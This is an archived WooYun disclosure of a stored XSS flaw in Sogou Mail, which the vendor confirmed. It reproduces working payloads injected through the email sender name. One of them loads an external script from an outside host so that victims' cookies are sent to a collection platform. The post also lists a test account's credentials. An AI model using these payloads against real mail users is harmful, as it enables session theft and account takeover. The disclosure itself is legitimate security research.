当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052573

漏洞标题:搜狗邮箱存储型XSS

相关厂商:搜狗

漏洞作者: 超威蓝猫

提交时间:2014-03-04 12:43

修复时间:2014-04-18 12:44

公开时间:2014-04-18 12:44

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-04: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-18: 细节向公众公开

简要描述:

搜狗邮箱(http://mail.sogou.com)存储型XSS

详细说明:

向搜狗邮箱发一封邮件,发件人名称为

" onmousemove=alert(document.cookie)//


01.jpg


没有过滤",鼠标划过该区域就触发。

02.jpg


但是这么小的区域,鼠标划过的几率未免也太小了吧? 我们注意到这里输出点位于style属性的后面,class属性的前面。这样留给我们的<b>标签可用的属性只有class和id了。这两个可以指定<b>标签使用CSS中的样式。在这个页面调用的几个CSS中找了半个小时后,找到了一个比较大的样式。

" id=mainPage class=link-button onmousemove="alert(document.cookie)//


03.jpg


勉强增大了点触发区域..
调用外部JS(QQ邮箱修改不了这么长的发件人名称,可以使用FastMail来发送):

" id=mainPage class=link-button onmousemove="with(body)appendChild(createElement(/script/.source)).src='//qqq.si/dsvlL2'"//


04.jpg


图中红框为触发区域,蓝框 为当含有XSS代码的邮件位于收件箱第一位时 打开邮件后鼠标可能的位置。很容易看出,(通常情况下)打开邮件后只要鼠标向左上方移动,点击"收件箱"或后退按钮,必然会触发XSS。

05.jpg


XSS收信平台收到的cookie:

06.jpg

漏洞证明:

如上。
测试帐号:crtest 密码:crtest

修复方案:

你们更专业

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-03-04 12:47

厂商回复:

感谢支持

最新状态:

暂无